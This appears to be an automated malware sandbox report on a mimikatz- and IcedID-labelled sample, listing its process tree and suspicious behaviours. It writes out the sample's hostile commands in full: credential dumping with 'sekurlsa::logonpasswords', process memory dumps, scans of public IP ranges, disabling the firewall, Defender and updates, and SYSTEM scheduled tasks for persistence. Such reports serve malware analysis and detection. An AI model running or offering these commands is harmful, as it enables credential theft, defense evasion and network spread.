Runs ping.exe 1 TTPs 1 IoCs
pid Process 3080 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3212 2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3212 2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe Token: SeDebugPrivilege 3620 tpmbzsb.exe Token: SeDebugPrivilege 1444 tpmbzsb.exe Token: SeDebugPrivilege 2780 vfshost.exe Token: SeDebugPrivilege 2628 asrwllflb.exe Token: SeLockMemoryPrivilege 4516 tbubha.exe Token: SeLockMemoryPrivilege 4516 tbubha.exe Token: SeDebugPrivilege 1552 asrwllflb.exe Token: SeDebugPrivilege 1044 asrwllflb.exe Token: SeDebugPrivilege 2028 asrwllflb.exe Token: SeDebugPrivilege 5068 asrwllflb.exe Token: SeDebugPrivilege 4724 asrwllflb.exe Token: SeDebugPrivilege 3096 asrwllflb.exe Token: SeDebugPrivilege 1732 asrwllflb.exe Token: SeDebugPrivilege 5108 asrwllflb.exe Token: SeDebugPrivilege 5080 asrwllflb.exe Token: SeDebugPrivilege 1608 asrwllflb.exe Token: SeDebugPrivilege 3860 asrwllflb.exe Token: SeDebugPrivilege 3268 asrwllflb.exe Token: SeDebugPrivilege 4836 asrwllflb.exe Token: SeDebugPrivilege 2556 asrwllflb.exe Token: SeDebugPrivilege 4608 asrwllflb.exe Token: SeDebugPrivilege 948 asrwllflb.exe Token: SeDebugPrivilege 3304 asrwllflb.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3212 2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe 3212 2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe 3620 tpmbzsb.exe 3620 tpmbzsb.exe 1444 tpmbzsb.exe 1444 tpmbzsb.exe 4712 xohudmc.exe 2060 tyttue.exe 1172 tpmbzsb.exe 1172 tpmbzsb.exe 5932 tpmbzsb.exe 5932 tpmbzsb.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3212 wrote to memory of 3760 3212 2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe 83 PID 3212 wrote to memory of 3760 3212 2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe 83 PID 3212 wrote to memory of 3760 3212 2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe 83 PID 3760 wrote to memory of 3080 3760 cmd.exe 86 PID 3760 wrote to memory of 3080 3760 cmd.exe 86 PID 3760 wrote to memory of 3080 3760 cmd.exe 86 PID 3760 wrote to memory of 3620 3760 cmd.exe 95 PID 3760 wrote to memory of 3620 3760 cmd.exe 95 PID 3760 wrote to memory of 3620 3760 cmd.exe 95 PID 1444 wrote to memory of 1804 1444 tpmbzsb.exe 97 PID 1444 wrote to memory of 1804 1444 tpmbzsb.exe 97 PID 1444 wrote to memory of 1804 1444 tpmbzsb.exe 97 PID 1804 wrote to memory of 1416 1804 cmd.exe 99 PID 1804 wrote to memory of 1416 1804 cmd.exe 99 PID 1804 wrote to memory of 1416 1804 cmd.exe 99 PID 1804 wrote to memory of 1624 1804 cmd.exe 100 PID 1804 wrote to memory of 1624 1804 cmd.exe 100 PID 1804 wrote to memory of 1624 1804 cmd.exe 100 PID 1804 wrote to memory of 2044 1804 cmd.exe 101 PID 1804 wrote to memory of 2044 1804 cmd.exe 101 PID 1804 wrote to memory of 2044 1804 cmd.exe 101 PID 1804 wrote to memory of 1952 1804 cmd.exe 102 PID 1804 wrote to memory of 1952 1804 cmd.exe 102 PID 1804 wrote to memory of 1952 1804 cmd.exe 102 PID 1804 wrote to memory of 4252 1804 cmd.exe 103 PID 1804 wrote to memory of 4252 1804 cmd.exe 103 PID 1804 wrote to memory of 4252 1804 cmd.exe 103 PID 1804 wrote to memory of 656 1804 cmd.exe 104 PID 1804 wrote to memory of 656 1804 cmd.exe 104 PID 1804 wrote to memory of 656 1804 cmd.exe 104 PID 1444 wrote to memory of 4072 1444 tpmbzsb.exe 105 PID 1444 wrote to memory of 4072 1444 tpmbzsb.exe 105 PID 1444 wrote to memory of 4072 1444 tpmbzsb.exe 105 PID 1444 wrote to memory of 2628 1444 tpmbzsb.exe 107 PID 1444 wrote to memory of 2628 1444 tpmbzsb.exe 107 PID 1444 wrote to memory of 2628 1444 tpmbzsb.exe 107 PID 1444 wrote to memory of 3900 1444 tpmbzsb.exe 110 PID 1444 wrote to memory of 3900 1444 tpmbzsb.exe 110 PID 1444 wrote to memory of 3900 1444 tpmbzsb.exe 110 PID 1444 wrote to memory of 2888 1444 tpmbzsb.exe 114 PID 1444 wrote to memory of 2888 1444 tpmbzsb.exe 114 PID 1444 wrote to memory of 2888 1444 tpmbzsb.exe 114 PID 2888 wrote to memory of 1136 2888 cmd.exe 116 PID 2888 wrote to memory of 1136 2888 cmd.exe 116 PID 2888 wrote to memory of 1136 2888 cmd.exe 116 PID 1136 wrote to memory of 1164 1136 wpcap.exe 117 PID 1136 wrote to memory of 1164 1136 wpcap.exe 117 PID 1136 wrote to memory of 1164 1136 wpcap.exe 117 PID 1164 wrote to memory of 220 1164 net.exe 119 PID 1164 wrote to memory of 220 1164 net.exe 119 PID 1164 wrote to memory of 220 1164 net.exe 119 PID 1136 wrote to memory of 3140 1136 wpcap.exe 120 PID 1136 wrote to memory of 3140 1136 wpcap.exe 120 PID 1136 wrote to memory of 3140 1136 wpcap.exe 120 PID 3140 wrote to memory of 1652 3140 net.exe 122 PID 3140 wrote to memory of 1652 3140 net.exe 122 PID 3140 wrote to memory of 1652 3140 net.exe 122 PID 1136 wrote to memory of 208 1136 wpcap.exe 123 PID 1136 wrote to memory of 208 1136 wpcap.exe 123 PID 1136 wrote to memory of 208 1136 wpcap.exe 123 PID 208 wrote to memory of 4076 208 net.exe 125 PID 208 wrote to memory of 4076 208 net.exe 125 PID 208 wrote to memory of 4076 208 net.exe 125 PID 1136 wrote to memory of 2200 1136 wpcap.exe 126
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2100
-
C:\Windows\TEMP\ilemjuulg\tbubha.exe"C:\Windows\TEMP\ilemjuulg\tbubha.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
C:\Users\Admin\AppData\Local\Temp\2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\qnbnbcbg\tpmbzsb.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3080
-
-
C:\Windows\qnbnbcbg\tpmbzsb.exeC:\Windows\qnbnbcbg\tpmbzsb.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3620
-
-
-
C:\Windows\qnbnbcbg\tpmbzsb.exeC:\Windows\qnbnbcbg\tpmbzsb.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1416
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2044
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4252
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:656
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:4072
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:2628
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:3900
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\qytbvbbbg\bsfeuuzgm\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\qytbvbbbg\bsfeuuzgm\wpcap.exeC:\Windows\qytbvbbbg\bsfeuuzgm\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:220
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:1652
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:4076
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2200
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:2112
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2928
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4996
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:5096
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3260
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:1624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2044
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\qytbvbbbg\bsfeuuzgm\bnbbwekbp.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\qytbvbbbg\bsfeuuzgm\Scant.txt2⤵PID:656
-
C:\Windows\qytbvbbbg\bsfeuuzgm\bnbbwekbp.exeC:\Windows\qytbvbbbg\bsfeuuzgm\bnbbwekbp.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\qytbvbbbg\bsfeuuzgm\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\qytbvbbbg\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\qytbvbbbg\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:1300 -
C:\Windows\qytbvbbbg\Corporate\vfshost.exeC:\Windows\qytbvbbbg\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "llhzgqueu" /ru system /tr "cmd /c C:\Windows\ime\tpmbzsb.exe"2⤵PID:324
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "llhzgqueu" /ru system /tr "cmd /c C:\Windows\ime\tpmbzsb.exe"3⤵
- Creates scheduled task(s)
PID:2408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qnmbgenzu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qnbnbcbg\tpmbzsb.exe /p everyone:F"2⤵PID:4852
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "qnmbgenzu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qnbnbcbg\tpmbzsb.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "glfehbwbp" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ilemjuulg\tbubha.exe /p everyone:F"2⤵PID:4640
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4492
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "glfehbwbp" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ilemjuulg\tbubha.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4404
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:4828
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:388
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:948
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4724
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:1424
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:856
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:1240
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4516
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:216
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:2336
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3980
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2364
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 764 C:\Windows\TEMP\qytbvbbbg\764.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:1916
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:4288
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:1164
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:5012
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:1276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:3784
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:4540
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:632
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:1548
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:860
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:2004
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:1908
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:3184
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:1780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:3352
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:4640
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:1036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:432
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:3064
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2360
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:2712
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:2112
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4712
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 1020 C:\Windows\TEMP\qytbvbbbg\1020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 2100 C:\Windows\TEMP\qytbvbbbg\2100.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 2568 C:\Windows\TEMP\qytbvbbbg\2568.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 2688 C:\Windows\TEMP\qytbvbbbg\2688.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 2988 C:\Windows\TEMP\qytbvbbbg\2988.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 3220 C:\Windows\TEMP\qytbvbbbg\3220.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3096
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 3868 C:\Windows\TEMP\qytbvbbbg\3868.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 4024 C:\Windows\TEMP\qytbvbbbg\4024.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5108
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 4088 C:\Windows\TEMP\qytbvbbbg\4088.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 3196 C:\Windows\TEMP\qytbvbbbg\3196.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 1904 C:\Windows\TEMP\qytbvbbbg\1904.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3860
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 1628 C:\Windows\TEMP\qytbvbbbg\1628.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 3512 C:\Windows\TEMP\qytbvbbbg\3512.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 3500 C:\Windows\TEMP\qytbvbbbg\3500.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 4348 C:\Windows\TEMP\qytbvbbbg\4348.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4608
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 3952 C:\Windows\TEMP\qytbvbbbg\3952.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\TEMP\qytbvbbbg\asrwllflb.exeC:\Windows\TEMP\qytbvbbbg\asrwllflb.exe -accepteula -mp 1008 C:\Windows\TEMP\qytbvbbbg\1008.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\qytbvbbbg\bsfeuuzgm\scan.bat2⤵PID:1876
-
C:\Windows\qytbvbbbg\bsfeuuzgm\tmazgcsbi.exetmazgcsbi.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:5044
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4900
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1912
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5760
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:872
-
-
-
C:\Windows\SysWOW64\tyttue.exeC:\Windows\SysWOW64\tyttue.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2060
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ilemjuulg\tbubha.exe /p everyone:F1⤵PID:1112
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3596
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ilemjuulg\tbubha.exe /p everyone:F2⤵PID:1796
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\tpmbzsb.exe1⤵PID:2004
-
C:\Windows\ime\tpmbzsb.exeC:\Windows\ime\tpmbzsb.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1172
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\qnbnbcbg\tpmbzsb.exe /p everyone:F1⤵PID:3820
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5088
-
-
C:\Windows\system32\cacls.execacls C:\Windows\qnbnbcbg\tpmbzsb.exe /p everyone:F2⤵PID:3732
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ilemjuulg\tbubha.exe /p everyone:F1⤵PID:4704
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5684
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ilemjuulg\tbubha.exe /p everyone:F2⤵PID:5080
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\tpmbzsb.exe1⤵PID:1692
-
C:\Windows\ime\tpmbzsb.exeC:\Windows\ime\tpmbzsb.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
